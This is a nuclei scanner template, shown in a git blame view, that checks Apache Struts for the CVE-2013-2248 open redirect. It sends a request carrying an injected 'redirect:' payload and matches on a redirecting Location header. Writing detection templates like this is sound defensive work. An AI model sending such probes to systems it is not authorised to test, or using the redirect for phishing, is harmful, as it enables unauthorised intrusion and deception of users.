nuclei-templates/cves/2013/CVE-2013-2248.yaml

20 lines
649 B
YAML
Raw Normal View History

2021-06-09 10:02:42 +00:00
id: CVE-2013-2248
info:
2021-06-15 20:15:31 +00:00
name: Apache Struts - Multiple Open Redirection Vulnerabilities
2021-06-09 10:02:42 +00:00
author: 0x_Akoko
description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/38666
severity: low
2021-06-15 20:15:31 +00:00
tags: cve,cve2013,apache,redirect,struts
2021-06-09 10:02:42 +00:00
requests:
- method: GET
path:
2021-06-15 20:15:31 +00:00
- "{{BaseURL}}/index.action?redirect:http://www.example.com/"
2021-06-09 10:02:42 +00:00
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
2021-06-15 20:15:31 +00:00
part: header